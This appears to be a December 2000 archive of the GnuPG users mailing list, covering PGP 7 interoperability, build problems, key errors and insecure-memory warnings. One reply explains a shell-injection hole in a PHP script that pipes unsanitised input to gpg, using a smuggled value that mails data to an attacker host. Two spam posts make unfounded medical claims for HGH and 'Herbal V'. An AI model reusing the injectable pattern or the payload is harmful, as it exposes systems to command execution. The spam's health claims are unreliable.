From afx@atsec.com Fri Dec 1 16:31:25 2000 From: afx@atsec.com (Andreas Siegert) Date: Fri, 1 Dec 2000 17:31:25 +0100 Subject: PGP 7 and encrypted session key is bad Message-ID: <20001201173125.A5986@cray.muc.atsec.de> Hi, I am using gpg 1.0.3 and 1.0.4 (Linux). I am trying to interoperate with PGP 7.0 (NT). When encrypting messages to the PGP system, no matter if it is a gpg or pgp generated key, I always get the error "encrypted session key is bad". If I send signed messages (with a GPG key) then I get a "found detached sig, no callback" error from PGP. Browsing the archive I found references to using CAST, and I ended up setting to following options: escape-from-lines lock-once rfc1991 cipher-algo CAST5 compress-algo 1 no-comment Still, no go. Am I missing something? Didn't see anything in the FAQ pointing to PGP 7 and I hope I have included everything I need that I could see from references to the older versions. Colleagues who use gpg 1.0.1 as shipped with redhat tell me that they don't have this problem. For obvious reasons, I'd like to us a more current release :-) thanks for any hints afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 1 17:22:46 2000 From: rich@cnylug.org (Rich) Date: Fri, 01 Dec 2000 12:22:46 -0500 Subject: New WinPT mailing lists. Message-ID: <3A27DE6610E.6AF7RICH@mail.dreamscape.com> Ok, so we never have to talk about WinPT in here again Timo set up 2 mailing lists for WinPT discussion. They are: winpt-users winpt-dev And they both reside at majordomo@lcsweb.net if any of you want to subscribe (I'm sure you all know how!) :-) Thank, Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 1 19:26:55 2000 From: rich@cnylug.org (Rich) Date: Fri, 01 Dec 2000 14:26:55 -0500 Subject: Yarrow Message-ID: <3A27FB7F104.8DF3RICH@mail.dreamscape.com> Does anyone have any familiarity with Counterpane's Yarrow PNRG, or has anyone used or implemented it in their code? Just curious. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From asishlaw@aaxisgroup.com Fri Dec 1 19:50:02 2000 From: asishlaw@aaxisgroup.com (Asish Law) Date: Fri, 01 Dec 2000 11:50:02 -0800 Subject: [Fwd: Problem compiling gnupg] References: <3A23FE02.ECA5D1E0@aaxisgroup.com> <20001129090552.G22524@gnupg.de> Message-ID: <3A2800EA.F3F50D77@aaxisgroup.com> This is a multi-part message in MIME format. --------------CC186E595B9EB5436A54792B Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi, I am trying to install ming32/cpd using Cygwin, and getting into some problems. I hope somebody can help me out. Please cc to asishlaw@aaxisgroup.com, as I am not subscribed to this list. I tried to follow the instructions in gnupg-1.0.4/doc/Readme.w32 to download and install mingw32/cpd, and getting into a few problems. 1. After I have untar'ed all the 4 packages (mingw32-cpd-0.2.4, windows32api-0.1.2, gcc-2.95.2, binutils-2.9.1), I try to run ./Configure in the mingw32-cpd-0.2.4 folder. It gives me syntax error at line 72 of the Configure file. I removed the keyword "function" from in-front of the function names, and then at least it continues with the configuration - I don't know if this is right. 2. Once I get configure started, it tries to patch gcc, but fails to patch around the end of the gcc-2.95.2.diff patch file, i.e., around the following statements: +#ifndef __MINGW32__ #include #include #include @@ -53,3 +54,4 @@ 3. If I ignore the above error, and finish configuring, then I run "make install", it proceeds until some point, but then is unable to find cpp.texi in the gcc-2.95.2/gcc folder. I don't understand why it is unable to find this file, because I can see it in the above folder. I have been trying to compile gnupg sources for more than a week now, and getting into one problem after another. Any help will be greatly appreciated. Thanks. Werner Koch wrote: > On Tue, 28 Nov 2000, Asish Law wrote: > > > I am trying to compile gnupg on Windows NT 4.0 using Cygwin. Follwing > > > While making, it errors when trying to compile rndunix.c in the cipher > > You have to use the rndw32.c thing. You may have to modify the source > to accomplish this. My suggestion is to use the mingw32/cpd system; > see doc/README.W32 > > Werner --------------CC186E595B9EB5436A54792B Content-Type: text/x-vcard; charset=us-ascii; name="asishlaw.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Asish Law Content-Disposition: attachment; filename="asishlaw.vcf" begin:vcard n:Law;Asish tel;cell:323-974-4581 tel;fax:323-651-3224 tel;home:323-934-5187 tel;work:323-653-1500 x-mozilla-html:FALSE url:http://www.aaxisgroup.com org:Aaxis Group Corp. adr:;;6399 Wilshire Blvd., suite 914;Los Angeles;CA;90048;USA version:2.1 email;internet:asishlaw@aaxisgroup.com title:Sr. Technical Consultant fn:Asish Law end:vcard --------------CC186E595B9EB5436A54792B-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Fri Dec 1 20:06:25 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Fri, 1 Dec 2000 21:06:25 +0100 (CET) Subject: PGP 7 and encrypted session key is bad In-Reply-To: <20001201173125.A5986@cray.muc.atsec.de> Message-ID: On Fri, 1 Dec 2000, Andreas Siegert wrote: > I am using gpg 1.0.3 and 1.0.4 (Linux). > I am trying to interoperate with PGP 7.0 (NT). > > When encrypting messages to the PGP system, no matter if it is a gpg or pgp > generated key, I always get the error "encrypted session key is bad". If I send > signed messages (with a GPG key) then I get a "found detached sig, no > callback" error from PGP. > escape-from-lines > lock-once > rfc1991 I don't know what rfc1991 actually does and I don't use it. The manpage says: "Try to be more RFC1991 (PGP 2.x) compliant." ??? > cipher-algo CAST5 > compress-algo 1 > no-comment I also have digest-algo sha1 # gpg will otherwise use RIPE-MD-160 and, though you don't appear to have key problems s2k-cipher-algo cast5 # gpg default for this is BLOWFISH s2k-digest-algo sha1 # default RIPE-MD-160 There have also been some No Callback discussions on pgp-users; unresolved AFAIK. Make sure it is not actually a problem with the plugin or the mail client on the Windows side. Are you using PGP/MIME? Try without. HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Younger@bdsm.at Fri Dec 1 21:58:51 2000 From: Younger@bdsm.at (Younger@bdsm.at) Date: Fri, 1 Dec 2000 22:58:51 +0100 Subject: REVERSE the AGING PROCESS 10-20 Years! Message-ID: <200012012158.eB1LwpZ10859@mail.hsp.de> HAVE YOU HEARD OF HUMAN GROWTH HORMONE (HGH)??? Released by your own pituitary gland, HGH starts declining in your 20s, even more in your 30s and 40s, eventually resulting in the shrinkage of major organs-plus all other symptoms related to old age. THIS CAN NOW BE REVERSED!!! IN THOUSANDS OF CLINICAL STUDIES, HGH HAS BEEN SHOWN TO ACCOMPLISH THE FOLLOWING: * Reduce Body Fat Without Dieting Build Lean Muscle WITHOUT EXERCISE! * Enhance Sexual Performance * Remove Wrinkles and Cellulite * Lower Blood Pressure and improve Cholesterol Profile * Improve Sleep, Vision and Memory * Restore Hair Color and Growth * Strengthen the Immune System * Increase Energy and Cardiac Output * Turn back your body's Biological Time Clock 10-20 years in 6 months of usage !!! You don't have to spend thousands of dollars on shots. You don't have to spend the $139.00 per bottle that HGH is selling for at some Clinics in the United States. For the next 30 Days, you can obtain a complete one-month supply of our HGH releaser for our special "New Customers" price of just $69.95 plus $6.00 shipping and handling. To ensure a constant supply and to SAVE EVEN MORE, you can order with confidence 3 bottles of HGH and GET 1 FREE - that's just $209.85 for 4 bottles, plus $6.00 shipping and handling. You SAVE $69.95! ORDER TODAY! Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express payments. Money Orders are accepted only by Postal Mail. Step 1: Place a check by your desired quanity. ______ 1 Bottle of HGH $69.95 ______ 2 Bottles of HGH $131.90 ($65.95 a bottle) ______ 4 Bottles of HGH (Buy 3 get 1 FREE. SAVE $69.95) $209.85 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$75.95, 2 bottles=$137.90, 4 bottles=$215.85 ] International shipping, please add $35 for any size order [ Total cost including shipping & handling, 1 bottle=$104.95, 2 bottles=$166.90, 4 bottles=$244.85 ] Foreign checks are not accepted. Credit cards & international money orders only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Please make your check or money order payable to "Lion Sciences National". Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: Lion Sciences National 273 S. State Rd. 7 #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: HGH is not intended to diagnose, treat, cure or prevent any disease. The FDA has not evaluated these statements. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ingo@Freund-HH.net Sat Dec 2 17:22:50 2000 From: Ingo@Freund-HH.net (Ingo Freund) Date: Sat, 2 Dec 2000 18:22:50 +0100 Subject: GnuPG on DEC/Compaq True64 4.0E Message-ID: Hi, could you pls CC me? my problem: has anybody heard about how to compile GnuPG on an Alpha machine with True64 4.0E on it?? I would be thankful for your advices... Ingo //------------------------------------------------------------------ Ingo Freund E-Mail Ingo.Freund@e-dict.net D-21079 Hamburg/Germany Ingo@Freund-HH.net //------------------------------------------------------------------ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From HV@derfriseur.de Sat Dec 2 19:35:18 2000 From: HV@derfriseur.de (HV@derfriseur.de) Date: Sat, 2 Dec 2000 20:35:18 +0100 Subject: At Last, Herbal V, the All Natural Alternative is Available! Message-ID: <200012021935.eB2JZHH23703@mail.hsp.de> Herbal V: An Incredible All-Natural Healthy Alternative To V----a Herbal V is the All Natural Approach to Male Virility, Vitality and Pleasure. Available N o w ! Welcome to the New Sexual Revolution. It's the all natural male potency and pleasure pill that men everywhere are buzzing about. Herbal V is safe, natural and specifically formulated to help support male sexual function and pleasure. You just take two easy-to-swallow tablets one hour before sex. And there's more great news - you can get Herbal V for less than $1 a pill. Amazing word of mouth praise on Herbal V has been spreading like wildfire-already over 1,500,000 men have chosen Herbal V. Since it is 100% natural you will never have to worry about safety. Try doctor-recommended Herbal V today and have the greatest night of your life! Herbal V... Bringing Back the Magic! 1,585,000 men can't be wrong. To date over 1 million men have tried the super supplement Herbal V. Here is why: No Doctor Visit Required Available Over the Counter Not a Drug 100% Natural Safe, No Worries Highest Quality Pharmaceutical-Grade Pure Nutriceuticals Guaranteed Potency & Purity Be a Real Man Again! Questions and Answers What is Herbal V? Herbal V is a proprietary blend that was specifically developed as a safe alternative for men who prefer an all-natural approach to address impotence and boost sexual performance. This amazing formula first became popular with Hollywood insiders and the wealthy elite. They were maximizing their sex lives, long before it was available to the general public. How does Herbal V work? Developed by a team whose goal was to create the perfect all-natural aphrodisiac. Herbal V is the result of that remarkable effort. The Herbal V formula contains a precise blend of cutting edge pro-sexual nutrients from around the world that provide nutritional support, making it possible for a man to have a pleasurable sexual experience. What can Herbal V do for me? Herbal V helps support male sexual function and pleasure in a safe and natural manner. Simply put, it can make your sex life incredible. Is Herbal V Safe? One of the great things about Herbal V is that it is not a drug. It is an incredible herbal dietary supplement that provides nutritional support for male sexual function and pleasure. One of the most comforting features of Herbal V is that you never have to worry about safety. Herbal V: Safe - Natural - Exciting Many have speculated that because Herbal V is so popular with men, it must contain prescription drugs or chemical components. Herbal V does not contain any elements or traces of any prescription drug. Herbal V is made using the world's most technologically advanced state-of-the-art cold processing equipment to ensure maximum purity. Herbal V has been independently analyzed by the nation's premier testing facility to ensure purity, quality and to end the rumors that, because it is so popular, it must somehow be chemical. It is not. Herbal V is natural - just as it says on the label. Herbal V is simply fantastic! Herbal V: Ingredients Yohimbe, saw palmetto, avena sativa, androstenedione, guarana, taurine, siberian ginseng, tribulus terrestris. Tribulus Terrestis is certified to enhanced testosterone levels by increasing Luteinzing hormone (LH) levels. Androstenedione which is a precursor to testosterone unlocks bound testosterone and makes it biologically active again quickly. This means a dramatic surge in desire. Avena Sativa Stimulates the neurotransmitter pleasure centers to maximum capacity. This greatly intensifies pleasure. Just listen to what Herbal V has done for the sex lives of people like you! “On a scale of 1 to 10, it's a 15. Electrifying. It's like a wonder pill!” — Justin Q B., New Haven, Texas “I haven't had sexual relations in 11 years. Then with Herbal V it was... wow! It works again!” — Sid R., Lakeland, Florida “I had sex four times in one night. It made me feel like a 19-year-old again.” — Chip S, Beech Mountain, North Carolina “Herbal V has turned my husband into a Sexual Superman! I like the fact that it's all natural and has no side effects. It's bringing back the good old days.” — Jennifer B, Beverly Hills, California The above testimonials are from product literature, and we have not independently verified them. However, the following testimonial is from a "senior" gentleman who has purchased his second bottle of Herbal V. When we heard his words with our own ears, we asked his permission to print them here. “Man! I'm wild as I can be! I feel like I'm 25 years old again! I'm not believing this!” — Mr. Murphy, age 64, Lampart, IL. Risk Free: Double Your Money Back Guarantee If Herbal V does not give the desired results as stated above, simply return the unused portion for a double-your money back refund. No questions asked ! Order Now: Safe, Fast, Secure, Private Herbal V with its DOUBLE YOUR MONEY BACK GUARANTEE is available only through this special promotional offer. Herbal V arrives in plain packaging for your privacy. Any and all information is kept strictly confidential. Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express.payments. Money Orders are accepted only by Postal Mail. Each bottle of Herbal V contains 30 tablets, approximately a 1 month supply. Step 1: Place a check by your desired quanity. ______ 1 Bottle of Herbal V $28 ______ 2 Bottles of Herbal V $48 ______ 3 Bottles of Herbal V $59 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$34, 2 bottles=$54, 3 bottles=$65 ] International Orders Please add $18 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$46, 2 bottles=$66, 3 bottles=$77 ] We cannot accept foreign checks. International money orders or credit cards only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: LSN 273 S. State Rd. 7, #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: Herbal V is not intended to diagnose, treat, cure or prevent any disease. As individuals differ, so will results. Herbal V helps provide herbal and nutritional support for male sexual performance. The FDA has not evaluated these statements. For details about our double your money back guarantee, please write to the above address, attention consumer affairs department; enclose a self addressed stamped envelope for this and any requested contact information. Thank You. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Sun Dec 3 20:51:32 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Sun, 3 Dec 2000 12:51:32 -0800 Subject: key has been created 10356 seconds in future Message-ID: <000f01c05d6a$d29b8d20$01a800c0@derekvok> I am getting this error when attempting import a new public key. I have found this error in the archives and I can't seem to find the answer. Any help would be appreciated. gpg: armor: BEGIN PGP PUBLIC KEY BLOCK gpg: armor header: Version: GnuPG v1.0.4-1 (MingW32) gpg: armor header: Comment: For info see http://www.gnupg.org gpg: loaded digest 2 gpg: pub 1024D/917FD74E 2000-12-03 asgq_ gpg: key has been created 10356 seconds in future (time warp or clock problem) gpg: key 917FD74E: invalid self-signature gpg: key has been created 10356 seconds in future (time warp or clock problem) gpg: key 917FD74E: invalid subkey binding gpg: key 917FD74E: skipped user ID 'asgq_ ' gpg: key 917FD74E: skipped subkey gpg: key 917FD74E: no valid user IDs gpg: this may be caused by a missing self-signature gpg: Total number processed: 1 gpg: w/o user IDs: 1 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Sat Dec 2 23:08:05 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Sat, 2 Dec 2000 15:08:05 -0800 Subject: Solved : key has been created 10356 seconds in future Message-ID: <000901c05cb4$beeac720$01a800c0@derekvok> Ahhh jeez... sorry about that post. The clock was off on my computer. Derek -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From adler@bnl.gov Sun Dec 3 21:15:25 2000 From: adler@bnl.gov (Stephen Adler) Date: Sun, 3 Dec 2000 21:15:25 +0000 Subject: insecure memory Message-ID: <1001203211525.ZM22800@ssadler.phy.bnl.gov> I get a message saying that my memory is insecure when I use the gpg utility. What is it really complaining about, should I worry about this, and if so, is there a fix? Thanks. Steve. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 3 21:39:28 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 03 Dec 2000 21:39:28 GMT Subject: insecure memory In-Reply-To: <1001203211525.ZM22800@ssadler.phy.bnl.gov> References: <1001203211525.ZM22800@ssadler.phy.bnl.gov> Message-ID: <20001203213445.83D7.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Stephen Adler, On 03 December 2000, I received the following message from you regarding "insecure memory" SA> I get a message saying that my memory is insecure when I use the gpg SA> utility. What is it really complaining about, should I worry about this, SA> and if so, is there a fix? SA> SA> Thanks. Steve. Yes, I got this too (I run GnuPG under Win98). I ignored it, and nothing seems to have happened. Later I received word from another GnuPG user with Win98 that they did the same. Unless somebody can advise me differently, I'll continue to ignore it.... Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 03 December 2000 21:34:45 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - WinPT v0.0.3pre2 (WIN98) Comment: My PGP Key: 0x99DB10BD | My GPG Key: EB389C4E iEYEARECAAYFAjoqvXgACgkQtwKLKus4nE5XUgCgwGZHXUSPXkWv3Rqv3HGbXeNi W90An0GhfGjOUcN+gv1fqCvAwLfDrgnN =5k0I -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Sun Dec 3 22:33:15 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Sun, 3 Dec 2000 22:33:15 +0000 Subject: insecure memory In-Reply-To: <1001203211525.ZM22800@ssadler.phy.bnl.gov>; from adler@bnl.gov on Sun, Dec 03, 2000 at 09:15:25PM +0000 References: <1001203211525.ZM22800@ssadler.phy.bnl.gov> Message-ID: <20001203223315.A3504@mcdonald.org.uk> --VS++wcV0S1rZb1Fb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Dec 03, 2000 at 09:15:25PM +0000, Stephen Adler wrote: > I get a message saying that my memory is insecure when I use the gpg > utility. What is it really complaining about, should I worry about this, > and if so, is there a fix? On varies Unix varieties (including Linux) it is possible to lock memory so that it is never swapped out to disk. gnupg terms this 'secure memory'. Under Windows it is not possible to do this. If you are seeing this warning under an OS that does support it, it may be that you need to make the gnupg binary setuid root, since locking memory in this way is something that only root can do. Andrew --=20 Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ --VS++wcV0S1rZb1Fb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Ksor/LupyPLe7TYRAn+nAJ9lzKcHWPQbM+nmFwLk74QJCweA1wCeM8p7 AQsfz7p6647B6PaDsfuQJBI= =UpNE -----END PGP SIGNATURE----- --VS++wcV0S1rZb1Fb-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jfreeman@connix.com Mon Dec 4 01:45:58 2000 From: jfreeman@connix.com (Joshua S. Freeman) Date: Sun, 3 Dec 2000 20:45:58 -0500 (EST) Subject: newbie question Message-ID: I'm making the transition from being a macOS user to a Linux user. (Potato). I've been using/updating the free version of PGP for the mac for several years now. Thus, I have many pulic keys on my keychain and I already have my own private and public keys... Is there a pointer to simple directions on how to move my keyfiles from MacOS to linux or do I have to generate new keys? TIA, J. -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Joshua S. Freeman | preferred email: jfreeman@connix.com pgp public key: finger jfreeman@connix.com http://www.threeofus.com -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 4 02:55:52 2000 From: lists@wordit.com (Marcus) Date: Mon, 04 Dec 2000 03:55:52 +0100 Subject: Passphrase in Perl script? Message-ID: <200012040355520633.0142AF10@smtprelay.t-online.de> How do you send the passphrase (for symmetric encryption) in a Perl script on Windows (or in DOS batch file)? On Windows, pipes are not a (real) option, AFAIK, and I'm not sure you can pass DOS *.* results to gpg? I want to prompt the user for the passphrase once and then encrypt all files given a certain pattern. I did this in Perl, and currently, the user is prompted twice for every file. What I'm missing is how to send the passphrase in a variable to gpg. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From telegraph@gmx.net Mon Dec 4 21:20:03 2000 From: telegraph@gmx.net (Gregor Zattler) Date: Mon, 4 Dec 2000 22:20:03 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <20001204222003.A2384@safran.dialup.fu-berlin.de> Hi folks, this -- not very good -- article was published at September, 29th in the german newspaper "Die Welt" (the world). "Die Welt" is an very conservative newspaper with very god connections to german security apparatus (military, services and police). It favours gpg over pgp for security reasons. Sorry, no translation: -------------cut-------- Bestmögliche Verschlüsselung für E-Mails Alternative zum Klassiker PGP: Warum die Kryptographie-Software Gnu-PG besser als die Konkurrenz ist Von Marcus Höfer Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von offizieller Seite gibt es Unterstützung. So gehört beispielsweise das Bundeswirtschaftsministerium zu den Förderern des Programms. Tatsächlich hat eine E-Mail de facto den Status einer Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie sogar ohne Wissen von Absender und Empfänger verändern und an den Adressaten weiterleiten. Wer das verhindern will, muss ein Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen haben viele Anwender verschreckt. Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner Vorstellung als absolut sicheres System. Ist PGP beim Sender und Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail während des Transports vom Absender zum Empfänger verändert wurde, und liefert eine hochgradig sichere digitale Unterschrift. Das verwendete Verfahren zur Verschlüsselung bietet eine enorme Zahl von verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer Wert. Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, wodurch viele Anwender das Vertrauen in die Sicherheitssoftware verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass staatliche Organisationen wie zum Beispiel die US-Datenpolizei National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb schon lange davor, PGP blind zu vertrauen. Anders sieht es beim Gnu Privacy Guard aus. Das kostenlose Programm wird von vielen "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der gesamte Quelltext zur Verfügung stehen muss, können auch keine geheimen Hintertüren eingebaut werden. Erstmals wurde Gnu-PG vom Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und Sun-OS. (c) Die WELT online http://www.welt.de -------------cut again --------- Ciao, Gregor -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bruce_horton@hotmail.com Mon Dec 4 21:57:50 2000 From: bruce_horton@hotmail.com (Bruce Horton) Date: Mon, 04 Dec 2000 21:57:50 -0000 Subject: smaller GPG for signature checking only Message-ID: Hello All, I would like to use GPG to create a digital signature checker for a Linux based embedded system. Memory and program footprint are premium resources in that environment. I *ONLY* need to be able to check that a signed file is valid. No need for general purpose encryption or signing, etc... I checked the GPG accompanying documentation, the FAQ, and did WWW and Usenet searches to no avail. Does anyone know how to do this? Either prebuilt x86 binaries or Makefile settings would be fine. Please CC me on any responses as I am not subscribed to the newsgroup. Thanks, -Bruce Horton _____________________________________________________________________________________ Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 03:08:16 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Mon, 4 Dec 2000 19:08:16 -0800 Subject: possible security hole Message-ID: <000c01c05e68$c1667160$01a800c0@derekvok> I've created a php script which uses pipes in execting a shell such as: "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail to\@me.com" the script runs as nobody the secret key has never seen the server the script only encrypts I don't care who the message comes from I only want the $sensitiveinfo I was told that this is insecure (even if no one breaks root!). Could someone with more expertise PLEASE give me an opinion? p.s. I know that you are sick of these questions (thank you for your program and your patience Werner!) Thank you in advance Derek -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jhmartin@mail.com Tue Dec 5 01:05:32 2000 From: jhmartin@mail.com (Jason Martin) Date: Mon, 4 Dec 2000 17:05:32 -0800 (PST) Subject: possible security hole In-Reply-To: <000c01c05e68$c1667160$01a800c0@derekvok> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I believe posible exploits are if $sensitiveinfo contains things like "blah; mail someone.evil@hacker.org "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > to\@me.com" > > the script runs as nobody > the secret key has never seen the server > the script only encrypts > I don't care who the message comes from I only want the $sensitiveinfo - -- PGP KeyID=0xEA954813 Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 finger jhmartin@pitr.scs.wsu.edu for key -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org Filter: gpg4pine 4.1 (http://azzie.robotics.net) iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2 bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw== =xi3u -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 05:26:59 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Mon, 4 Dec 2000 21:26:59 -0800 Subject: possible security hole References: Message-ID: <000601c05e7b$fe8fd000$01a800c0@derekvok> thank you for your input. Could I bother you to "briefly" explain encoding 